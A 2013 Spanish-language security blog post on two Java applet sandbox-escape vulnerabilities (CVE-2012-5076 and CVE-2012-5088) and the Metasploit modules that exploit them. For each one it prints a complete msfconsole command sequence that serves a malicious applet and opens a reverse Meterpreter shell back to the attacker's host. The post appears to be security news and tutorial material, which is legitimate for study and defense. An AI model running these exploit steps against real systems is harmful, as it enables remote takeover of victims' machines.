24 ene. 2013

2 Graves vulnerabilidades en Java permite Ejecución de Código Remoto, Java Applet AverageRangeStatisticImpl & Method Handle (Videos MSF)

Hace muy poco que se había descubierto un Grave 0day en Java que permitía a un atacante tomar el control de un sistema, esto trajo muchos inconvenientes tanto por parte de Oracle como de los usuarios de Java, llego el punto en que se recomendó por parte del gobierno de EE.UU a desactivar Java o simplemente eliminarlo por los potenciales perjuicios a los sistemas con Java corriendo.

Otro problema fue la tardanza de un parche oficial por parte de Java, pero tan rápido como salió el parche arreglando el 0day, aparecieron voces diciendo que no estaba bien parchado y que aun era posible explotar el bug. A todos estos inconvenientes sumemosle el hecho de que se empezaron a comercializar por internet 2 nuevas vulnerabilidades en Java...

Recientemente (01-22-2013) Metasploit proporcionado los módulos que explotan estos 2 bugs, y aquí los dejo con las especificaciones y los videos de explotación con Metasploit:

CVE-2012-5076 Java Applet AverageRangeStatisticImpl:

Este módulo abusa de AverageRangeStatisticImpl a partir de un Applet de Java para ejecutar código arbitrario fuera del sandbox de Java, este es otro vector de ataque descubierto y parchado en noviembre de 2012, pero que renace de las cenizas. Las versiones de Java afectadas son Oracle Java version 7 Update 7 y anteriores.

use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-5088 Java Applet Method Handle: 

Este módulo es parecido al anterior, pero abusa de Method Handle class a partir de un Applet de Java para ejecutar código arbitrario fuera del sandbox de Java. Las versiones de Java afectadas son Oracle Java version 7 Update 7 y anteriores.

use exploit/multi/browser/java_jre17_method_handle
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

Al actualizar Metasploit los módulos se agregaran automáticamente, igualmente les dejo los módulos:

Videos:

Más Información: https://community.rapid7.com/

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

0 Notaciones:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (145) Seguridad Web (140) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.